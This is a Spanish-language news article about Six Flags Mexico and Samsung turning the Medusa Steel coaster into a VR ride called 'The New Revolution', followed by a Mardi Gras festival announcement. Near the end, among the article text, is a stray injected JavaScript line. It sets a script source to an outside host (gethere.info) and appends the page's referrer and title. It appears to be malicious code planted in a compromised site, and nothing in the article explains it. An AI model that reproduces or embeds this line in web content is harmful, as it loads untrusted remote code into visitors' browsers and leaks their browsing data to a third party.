Six Flags trae por primera vez a México la realidad virtual

A principio de este año Six Flags @SixFlagsMexico y Samsung @SamsungMexico firmaron un acuerdo de colaboración que llevaría la Realidad Virtual a las famosas atracciones de la compañía, incrementando la intensidad que se siente al subirse a las Montañas Rusas de los parques de la marca.

La atracción mejor conocida hasta ahora como Medusa Steel, la montaña rusa híbrida de acero y madera de más de poco más de 1 kilómetro. se transformará en “The New Revolution”, la primera Montaña Rusa en México que combina Realidad Virtual con la experiencia real gracias al uso de las gafas de Samsung. Los usuarios que se suban a “The New Revolution” no sólo sentirán el vértigo de viajar en una atracción, sino que también vivirán una aventura inigualable.

Así, en lugar de ver las barras de acero y las largas filas que hay en el parque temático, los pasajeros estarán a bordo de un jet que los transportará a una batalla futurista donde tendrán la sensación de que están combatiendo a los extraterrestres en el espacio.

Para esta simulación, deberán colocarse unos lentes “Gear VR” y los auriculares haciéndolos sentir adrenalina con fuertes caídas, lazos invertidos y giros de gran alcance.

“The New Revolution Roller Coaster incorporará imágenes de alta definición en 360 grados mediante los lentes Gear VR de Samsung, sincronizados con el recorrido de la Medusa, con una temática de salvar al mundo de extraterrestres”, dijo la directora de ventas de Six Flags Entertainment, Debbie Stuart.

La inauguración de The New Revolution en el Six Flags de la Ciudad de México ocurrirá en febrero de 2017 y se aclaró que el uso del visor de realidad virtual será opcional.

Y las sorpresas no paran, también en Six Flags México, a partir de esta primavera se llevará a cabo “Mardi Gras Festival”, un colorido carnaval estilo Nueva Orleans que se realizará del 17 de marzo al 1 de mayo.

Mardi Gras Festival contará con un auténtico desfile con carrozas alegóricas, que se complementará con un tradicional ambiente de carnaval y deliciosa comida típica de Nueva Orleans, además de una decoración colorida a lo largo de todo el parque.

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||
Comentarios